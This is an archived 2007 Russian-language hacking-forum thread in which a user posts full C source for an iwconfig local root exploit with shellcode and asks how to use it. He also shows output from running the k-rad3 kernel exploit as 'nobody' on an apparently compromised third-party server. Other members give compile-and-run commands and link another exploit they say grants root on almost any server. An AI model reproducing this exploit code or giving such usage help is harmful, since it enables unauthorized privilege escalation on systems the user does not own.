ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > *nix
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Root сплоит
  #1  
Старый 17.03.2007, 19:20
~GroM~
Познающий
Регистрация: 13.01.2007
Сообщений: 44
Провел на форуме:
148599

Репутация: 7
Отправить сообщение для ~GroM~ с помощью ICQ
По умолчанию Root сплоит

здравствуйте вот тут есть такой сплоит


/*
Name: iw-config.c
Copyright: !sh2k+!tc2k
Author: heka
Date: 11/11/2003
Greets: bx, pintos, eksol, hex, keyhook, grass, toolman, rD, shellcode, dunric, termid, kewlcat, JiNKS
Description: /sbin/iwconfig - local root exploit
iwconfig manipulate the basic wireless parameters

*/

#include <stdio.h>

#define BIN "/sbin/iwconfig"

unsigned char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x13\xcd\x80\x31\xc0\xb0\ x2e"
"\xcd\x0\x31\xc0\x53\x68\x77\x30\x30\x74\x89\x e3"
"\xb0\x27\xcd\x80\x30\xc0\xb0\x3d\xcd\x80\x31\ xc0"
"\x31\xdb\x31\xc9\xb1\x0a\x50\x68\x2e\x2e\x2f\ x2f"
"\xe2\xf9\x89\xe3\xb0\x0c\xcd\x80\x31\xc0\x31\ xdb"
"\x6a\x2e\x89\xe3\xb1\x3d\xcd\x80\x31\xc0\x31\ xdb"
"\x31\xc9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\ x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\ xcd"
"\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80";

int
main ()
{
int x;
char buf[97], out[13321], *buffer;
unsigned long ret_add = 0xbffffbb8, *add_ptr ;
buffer = buf;
add_ptr = (long *)buffer;
for (x=0; x<97-1; x+=4)
*(add_ptr++)=ret_add;
memset ((char *)out, 0x90, 1337);
memcpy ((char *)out + 333, shellcode, strlen(shellcode));
memcpy((char *)out, "OUT=", 4);
putenv(out);
execl (BIN, BIN, buf, NULL);
return 0;
}
я его скомпилил на сервере у меня получилося сейчас вопрос как с ним работать ?
 

  #2  
Старый 17.03.2007, 19:24
gcc
Участник форума
Регистрация: 27.01.2007
Сообщений: 118
Провел на форуме:
333575

Репутация: 44
По умолчанию

Во-первых не туда отпостил, для сплойтов есть спец тема выше.
Как работать - запускай получившийся бинарник =)
 

  #3  
Старый 17.03.2007, 19:33
~GroM~
Познающий
Регистрация: 13.01.2007
Сообщений: 44
Провел на форуме:
148599

Репутация: 7
Отправить сообщение для ~GroM~ с помощью ICQ
По умолчанию

как именно запускать ?
 

  #4  
Старый 17.03.2007, 19:35
~GroM~
Познающий
Регистрация: 13.01.2007
Сообщений: 44
Провел на форуме:
148599

Репутация: 7
Отправить сообщение для ~GroM~ с помощью ICQ
По умолчанию

да и еще одно как запускать вот этот сплоит k-rad3.c кто может помогите стукните в 924607
запускаю вроде все правильо

bash-2.05b$ ./k-rad3 -t 1 -p 2
←[1;30m[ ←[1;37m k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit ←[1;30m ]←[0m
←[1;30m[ ←[1;37mDiscovered Jan 2005 by sd <sd@fucksheep.org>←[1;30m ]←[0m
←[1;30m[ ←[1;37mModified 2005/9 by alert7 <alert7@xfocus.org>←[1;30m ]←[0m
[+] try open /proc/cpuinfo .. ok!!
[+] find cpu flag pse in /proc/cpuinfo
[+] CONFIG_X86_PAE :none
[+] Cpu flag: pse ok
[+] Exploit Way : 0
[+] Use 2 pages (one page is 4K ),rewrite 0xc0000000--(0xc0002000 + n)
[+] thread_size 1 (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192
epoll_wait: Invalid argument
Linux landing.captainserver.net 2.6.8-022stab070.4-enterprise #1 SMP Mon Mar 6
5:28:36 MSK 2006 i686 athlon i386 GNU/Linux
[+] idtr.base 0xffff4000 ,base 0xc0000000
[+] kwrite base 0xc0000000, buf 0xbffed7e0,num 8196
[-] This kernel not vulnerability!!!
bash-2.05b$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
bash-2.05b$

но что то ни чего не выходит
 

  #5  
Старый 17.03.2007, 19:54
limpompo
Друг Клитора
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553

Репутация: 1329


По умолчанию

Цитата:
+] idtr.base 0xffff4000 ,base 0xc0000000
[+] kwrite base 0xc0000000, buf 0xbffed7e0,num 8196
[-] This kernel not vulnerability!!!
Всё и так написано Kernel not vulnerability.....
 

  #6  
Старый 17.03.2007, 20:17
~GroM~
Познающий
Регистрация: 13.01.2007
Сообщений: 44
Провел на форуме:
148599

Репутация: 7
Отправить сообщение для ~GroM~ с помощью ICQ
По умолчанию

Спасибо а вообще запускал правильно? и еще одно как первый сплоит юзать
 

  #7  
Старый 18.03.2007, 00:50
gcc
Участник форума
Регистрация: 27.01.2007
Сообщений: 118
Провел на форуме:
333575

Репутация: 44
По умолчанию

Ну тогда уж gcc iw-config.c -o iw-config
./iw-config

Последний раз редактировалось hsi; 18.03.2007 в 12:56..
 

  #8  
Старый 18.03.2007, 14:48
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

ультросплоент
http://xpl.jino-net.ru/gcc343prior.c
даёт права uid=0(root) gid=0(root) почти на любом серваке

гавносплойт=\
__________________
 

  #9  
Старый 19.03.2007, 13:46
~GroM~
Познающий
Регистрация: 13.01.2007
Сообщений: 44
Провел на форуме:
148599

Репутация: 7
Отправить сообщение для ~GroM~ с помощью ICQ
По умолчанию

спасибо тоха с меня плюс
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
про socks5 banall *nix 9 11.10.2006 10:17
Помогите откомпилить!! LoFFi Уязвимости 19 19.03.2006 22:56



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ